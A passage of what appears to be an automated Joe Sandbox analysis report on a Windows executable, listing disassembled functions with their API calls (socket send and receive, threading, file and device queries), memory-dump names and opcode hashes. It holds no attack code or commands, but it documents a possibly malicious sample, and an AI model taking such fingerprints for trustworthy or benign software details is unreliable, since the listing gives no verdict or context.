                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _allshl_aullshr
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 673498613-0
                                                                                                                                                                                                      • Opcode ID: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                                                                                      • Instruction ID: 526ada65c8064deb58b6c5f7a60763359622b06b1071bb594fb8502c37df64e6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 676eacc0c821b4ee5133c352ae25f7f86d1fbe8fb33d794599ac5fe58c8be501
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1111F32600618AB8B10EF5EC4426CABBD6EF84361B25C136FC2CDF359D634DA454BD8
                                                                                                                                                                                                      Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                                                                                                      • htons.WS2_32(?), ref: 00401281
                                                                                                                                                                                                      • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                                                                                      • String ID: pdu
                                                                                                                                                                                                      • API String ID: 2164660128-2320407122
                                                                                                                                                                                                      • Opcode ID: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                                                                                      • Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40dba2aff78ba806bae8a6d526fcd496496bfc60c7e892d92015a678719dcbf9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                                                                                                                                      Function 0040DE90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0040DEA9
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040DED8
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0040DEE7
                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 0040DEF4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$CloseDeleteEnterHandleLeave
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 3102160386-3424199868
                                                                                                                                                                                                      • Opcode ID: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                                                                                      • Instruction ID: ac11750a047aba6f79e7b8cc85f80e728fdbf261864cbbb5073f4aff0768140e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb7e0bdf7f07b64480a2601e76dd0e203c57d6389b493651e08ccb706d318709
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65115E74D00208EBDB08DF94D984A9DBB75FF48309F1081A9E806AB341D734EE94DB89
                                                                                                                                                                                                      Function 00401330 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42synchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
                                                                                                                                                                                                        • Part of subcall function 0040AB60: HeapFree.KERNEL32(?,00000000,00402612,?,00402612,?), ref: 0040ABBB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseEventFreeHandleHeapObjectSingleWait
                                                                                                                                                                                                      • String ID: pdu$.Wu
                                                                                                                                                                                                      • API String ID: 309973729-3067427362
                                                                                                                                                                                                      • Opcode ID: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
                                                                                                                                                                                                      • Instruction ID: d5c9189d357da9e52bb83819b3173fb4210b6dfc4c93b70417a9898bc2e8bd9b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5e20e1ff81c8238d4906aefd24b36edb0459e4a4963a0916b72258a76a9c2c1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D0186765003109BCB20AF66ECC4E9B7779AF48711B044679FD056B396C738E85087A9
                                                                                                                                                                                                      Function 00406360 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
                                                                                                                                                                                                      • QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
                                                                                                                                                                                                      • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeviceDriveQueryType
                                                                                                                                                                                                      • String ID: ?c@$\??\
                                                                                                                                                                                                      • API String ID: 1681518211-744975932
                                                                                                                                                                                                      • Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                                                                                      • Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99
                                                                                                                                                                                                      Function 00401820 Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401846
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 004018B1
                                                                                                                                                                                                        • Part of subcall function 004017A0: EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                                        • Part of subcall function 004017A0: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                                        • Part of subcall function 004017A0: LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Interlocked$CriticalExchangeSection$DecrementEnterLeave
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3966618661-0
                                                                                                                                                                                                      • Opcode ID: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
                                                                                                                                                                                                      • Instruction ID: 3b152336b57d45bd484518126aaa8069a8e5b95e48398e5ac574b9fb36890b51
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c65f9457ed9e15c383df9cb8ba30375030b5d01632cb0b7646eecf1c4dd6c2f0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C41C371A00A02ABC714AB399848793F3A4BF84310F14823AE82D93391E739B855CB99
                                                                                                                                                                                                      Function 00409440 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _allshl
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 435966717-0
                                                                                                                                                                                                      • Opcode ID: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                                                                                      • Instruction ID: d897fcd8a6e9f4a7bfe0dcf07208541f34cf8f45c30d72ee7b1e381ef02b65f1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5e550ec765fb5e4c7b4ab991364e2b02bfb294b8b2cc5675fd73cc28fc319ee
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2F03672D015289B9710FEEF84424CAFBE59F89354B21C176F818E3360E6709E0946F1
                                                                                                                                                                                                      Function 004076C0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,?,?), ref: 004076E8
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,00407720,00000000,00000000,00000000), ref: 0040770A
                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00407711
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseCreateHandleThreadmemcpy
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 2064604595-3424199868
                                                                                                                                                                                                      • Opcode ID: 0ababd338b93d4f15b5807df93ab29fe9547c17ebc95fa2dc8514e940c4b66a1
                                                                                                                                                                                                      • Instruction ID: 1765171bc77b4966af89c460e37a8a9fa1404b8c40c23c814704cc40933dc83e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ababd338b93d4f15b5807df93ab29fe9547c17ebc95fa2dc8514e940c4b66a1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54F090B1A04308FBDB00DFA4DC46F9E7778AB48704F208468FA08A72C1D675BA10C769
                                                                                                                                                                                                      Function 0040F1F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                                                                                      • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 1378416451-3424199868
                                                                                                                                                                                                      • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                                      • Instruction ID: 7e163f13d574deee43add6bab66e88a36a5285de070472799180e575aa2043d7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0F03774A40308FBDB20DFA4DC49FCD7B74EB04701F2082A4FA047B2D0D6B55A418B44
                                                                                                                                                                                                      Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                                                                                                      • recvfrom.WS2_32 ref: 0040119C
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3980219359-0
                                                                                                                                                                                                      • Opcode ID: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                                                                                      • Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
                                                                                                                                                                                                      • Opcode Fuzzy Hash: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA
                                                                                                                                                                                                      Function 00401F50 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401F83
                                                                                                                                                                                                      • WSAGetOverlappedResult.WS2_32(?,?,?,00000000,?), ref: 00401FAF
                                                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 00401FB9
                                                                                                                                                                                                      • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000000FF), ref: 00401FF9
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CompletionQueuedStatus$ErrorLastOverlappedResult
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2074799992-0
                                                                                                                                                                                                      • Opcode ID: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                                      • Instruction ID: 923efa3f85c100d8dcf87aa4bb405070ff806fabc372267044aefe38fa55a991
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0873c704f9b42db8694245f3ff021b9bdebcd9b4b0cbd7409a356cfb69af86d5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B72131715083119BC200DF55D844D6BB7E8BFCCB54F044A2DF598A3291D774EA49CBAA
                                                                                                                                                                                                      Function 00401C50 Relevance: 6.1, APIs: 4, Instructions: 59networksleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401C88
                                                                                                                                                                                                      • WSAGetLastError.WS2_32(?,?,004021A5,00000000), ref: 00401C90
                                                                                                                                                                                                      • Sleep.KERNEL32(00000001,?,?,004021A5,00000000), ref: 00401CA6
                                                                                                                                                                                                      • WSARecv.WS2_32(?,?,00000001,?,?,?,00000000), ref: 00401CCC
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Recv$ErrorLastSleep
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3668019968-0
                                                                                                                                                                                                      • Opcode ID: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                                      • Instruction ID: 470b9b0004fc9485880b3b0232d8394a6163a25caab740c915041083b8486df8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 632ea2d54cc4383f5132f6b2993607fdd6e2119cf45a08eb7173c4bd646593aa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8811AD72148305AFD310CF65EC84AEBB7ECEB88710F40092EF945D2150E6B9E949A7B6
                                                                                                                                                                                                      Function 00401AE0 Relevance: 6.0, APIs: 4, Instructions: 49networksleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B0C
                                                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 00401B12
                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 00401B28
                                                                                                                                                                                                      • WSASend.WS2_32(?,?,00000001,?,00000000,?,00000000), ref: 00401B4A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Send$ErrorLastSleep
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2121970615-0
                                                                                                                                                                                                      • Opcode ID: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                                      • Instruction ID: 56798eeddd779857b304cdb020dc52eae5646efd672cabe94dca1e5c1b4e91c2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b06a38cb9fde64199f830136d194dacddc283b62bd49c201cde61758c607cabc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90014B712483046EE7209B96DC88F9B77A8EBC8711F408429F608DA2D0D7B5A9459B7A
                                                                                                                                                                                                      Function 004017A0 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,0040186C,?,?), ref: 004017B0
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004017C0
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 004017CD
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,0040186C,?,?), ref: 00401808
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2223660684-0
                                                                                                                                                                                                      • Opcode ID: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                                                                                      • Instruction ID: dfa7cd44099aa032f197b32b6ae0ce93fcebf173881def012ca395fa41330849
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a256af2c019b276b8838bcc1186c61ecce618c98c01d702573358750c80b1c1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD01F7356423049FC3209F26EC44ADB77F8AF49712B04443EE50693650DB34F545DB28
                                                                                                                                                                                                      Function 00407390 Relevance: 6.0, APIs: 4, Instructions: 22memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002,?,?,004083D7), ref: 00407398
                                                                                                                                                                                                      • SysAllocString.OLEAUT32(004161D0), ref: 004073A3
                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 004073C8
                                                                                                                                                                                                        • Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 004073C2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 459949847-0
                                                                                                                                                                                                      • Opcode ID: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
